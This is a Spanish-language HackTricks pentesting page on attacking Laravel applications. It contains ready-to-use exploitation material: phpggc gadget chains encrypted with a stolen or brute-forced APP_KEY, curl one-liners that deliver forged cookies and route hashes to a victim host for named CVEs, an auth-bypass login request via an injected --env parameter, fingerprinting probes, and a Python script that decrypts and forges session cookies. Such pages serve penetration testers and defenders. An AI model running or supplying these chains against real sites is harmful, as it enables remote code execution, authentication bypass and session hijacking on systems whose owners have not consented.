Laravel

Reading time: 10 minutes

tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Laravel SQLInjection

Lee información sobre esto aquí: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY y detalles internos de cifrado (Laravel \u003e=5.6)

Laravel utiliza AES-256-CBC (o GCM) con integridad HMAC internamente (Illuminate\\Encryption\\Encrypter). El texto cifrado bruto que finalmente se envía al cliente es Base64 de un objeto JSON como:

json

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) hará serialize() del texto plano por defecto, mientras que decrypt($payload, $unserialize=true) automáticamente unserialize() el valor descifrado. Por lo tanto, cualquier atacante que conozca la clave secreta de 32 bytes APP_KEY puede crear un objeto PHP serializado cifrado y obtener RCE vía métodos mágicos (__wakeup, __destruct, …).

PoC mínimo (framework ≥9.x):

php

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Inyecta la cadena producida en cualquier sink vulnerable de decrypt() (route param, cookie, session, …).

laravel-crypto-killer 🧨

laravel-crypto-killer automatiza todo el proceso y añade un práctico modo bruteforce:

bash

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

El script soporta de forma transparente tanto payloads CBC como GCM y regenera el campo HMAC/tag.

Patrones vulnerables en el mundo real

Proyecto	Vulnerable sink	Gadget chain
Invoice Ninja ≤v5 (CVE-2024-55555)	`/route/{hash}` → `decrypt($hash)`	Laravel/RCE13
Snipe-IT ≤v6 (CVE-2024-48987)	`XSRF-TOKEN` cookie cuando `Passport::withCookieSerialization()` está habilitado	Laravel/RCE9
Crater (CVE-2024-55556)	`SESSION_DRIVER=cookie` → `laravel_session` cookie	Laravel/RCE15

El flujo de explotación siempre es:

Obtener o brute-forcear la APP_KEY de 32 bytes.
Construir una gadget chain con PHPGGC (por ejemplo Laravel/RCE13, Laravel/RCE9 o Laravel/RCE15).
Encriptar el gadget serializado con laravel_crypto_killer.py y la APP_KEY recuperada.
Entregar el ciphertext al sink vulnerable decrypt() (parámetro de ruta, cookie, session …) para provocar RCE.

A continuación hay concisos one-liners que demuestran la ruta completa de ataque para cada CVE del mundo real mencionada arriba:

bash

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Porque cada respuesta nueva de Laravel establece al menos 1 cookie cifrada (XSRF-TOKEN y usualmente laravel_session), escáneres públicos de Internet (Shodan, Censys, …) leak millones de textos cifrados que pueden atacarse offline.

Principales hallazgos de la investigación publicada por Synacktiv (2024-2025):

Conjunto de datos julio 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
Conjunto de datos mayo 2025 » 625 k tokens, 3.56 % keys cracked
1 000 servidores aún vulnerables a la legacy CVE-2018-15133 porque los tokens contienen directamente datos serializados.
Reutilización masiva de claves – los Top-10 APP_KEYs son valores predeterminados hard-coded incluidos en plantillas comerciales de Laravel (UltimatePOS, Invoice Ninja, XPanel, …).

La herramienta privada en Go nounours eleva el throughput de bruteforce AES-CBC/GCM a ~1.5 billion tries/s, reduciendo el cracking del dataset completo a <2 minutos.

CVE-2024-52301 – HTTP argv/env override → auth bypass

Cuando register_argc_argv=On de PHP (típico en muchas distros), PHP expone un array argv para peticiones HTTP derivado de la query string. Versiones recientes de Laravel parseaban estos args “CLI-like” y respetaban --env=<value> en tiempo de ejecución. Esto permite cambiar el entorno del framework para la petición HTTP actual simplemente añadiéndolo a cualquier URL:

Comprobación rápida:
Visita https://target/?--env=local o cualquier cadena y busca cambios dependientes del entorno (debug banners, footers, errores detallados). Si la cadena se refleja, el override está funcionando.
Ejemplo de impacto (lógica de negocio que confía en un env especial):
Si la app contiene ramas como if (app()->environment('preprod')) { /* bypass auth */ }, puedes autenticarte sin credenciales válidas enviando el POST de login a:
POST /login?--env=preprod
Notas:
Funciona por petición, sin persistencia.
Requiere register_argc_argv=On y una versión vulnerable de Laravel que lea argv para HTTP.
Primitiva útil para exponer errores más detallados en entornos “debug” o para activar rutas de código condicionadas por el entorno.
Mitigaciones:
Desactivar register_argc_argv para PHP-FPM/Apache.
Actualizar Laravel para que ignore argv en peticiones HTTP y eliminar cualquier supuesto de confianza vinculado a app()->environment() en rutas de producción.

Minimal exploitation flow (Burp):

http

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

Trucos de Laravel

Modo debug

Si Laravel está en modo debug podrás acceder al code y a los datos sensibles.
For example http://127.0.0.1:8000/profiles:

Esto suele ser necesario para explotar otros Laravel RCE CVEs.

Fingerprinting & exposed dev endpoints

Comprobaciones rápidas para identificar un stack Laravel y herramientas de desarrollo peligrosas expuestas en producción:

/_ignition/health-check → Ignition presente (herramienta de debug usada en CVE-2021-3129). Si es accesible sin autenticación, la app puede estar en modo debug o mal configurada.
/_debugbar → Laravel Debugbar assets; a menudo indica modo debug.
/telescope → Laravel Telescope (monitor de desarrollo). Si es público, espera una amplia divulgación de información y posibles acciones.
/horizon → Queue dashboard; divulgación de versión y a veces acciones protegidas por CSRF.
X-Powered-By, cookies XSRF-TOKEN and laravel_session, and Blade error pages also help fingerprint.

bash

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel guarda la APP que usa para cifrar las cookies y otras credenciales dentro de un archivo llamado .env que puede ser accedido mediante un path traversal en: /../.env

Laravel también mostrará esta información en la página de debug (que aparece cuando Laravel encuentra un error y está activada).

Usando la APP_KEY secreta de Laravel puedes descifrar y volver a cifrar cookies:

python

import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps

#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3

def mcrypt_decrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.decrypt(value)


def mcrypt_encrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.encrypt(value)


def decrypt(bstring):
global key
dic = json.loads(base64.b64decode(bstring).decode())
mac = dic['mac']
value = bytes(dic['value'], 'utf-8')
iv = bytes(dic['iv'], 'utf-8')
if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
return ''


def encrypt(string):
global key
iv = os.urandom(16)
#string = dumps(string)
padding = 16 - len(string) % 16
string += bytes(chr(padding) * padding, 'utf-8')
value = base64.b64encode(mcrypt_encrypt(string, iv))
iv = base64.b64encode(iv)
mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))

app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlxcL1JGY0t6YzhaaGNHR1duSktIdjF1elxcLzV4a3dUOElZVzMw aG01dGk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
#b'{"data":"a:6:{s:6:\"_token\";s:40:\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\";s:8:\"username\";s:8:\"guestc32\";s:5:\"order\";s:2:\"id\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}')

Laravel Deserialization RCE

Versiones vulnerables: 5.5.40 y 5.6.x hasta 5.6.29 (https://www.cvedetails.com/cve/CVE-2018-15133/)

Aquí puedes encontrar información sobre la vulnerabilidad de deserialización: https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/

Puedes probarla y explotarla usando [https://github.com/kozmic/laravel-poc-CVE-2018-15133]
O también puedes explotarla con metasploit: use unix/http/laravel_token_unserialize_exec

CVE-2021-3129

Otra deserialización: https://github.com/ambionics/laravel-exploits

Referencias

tip

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.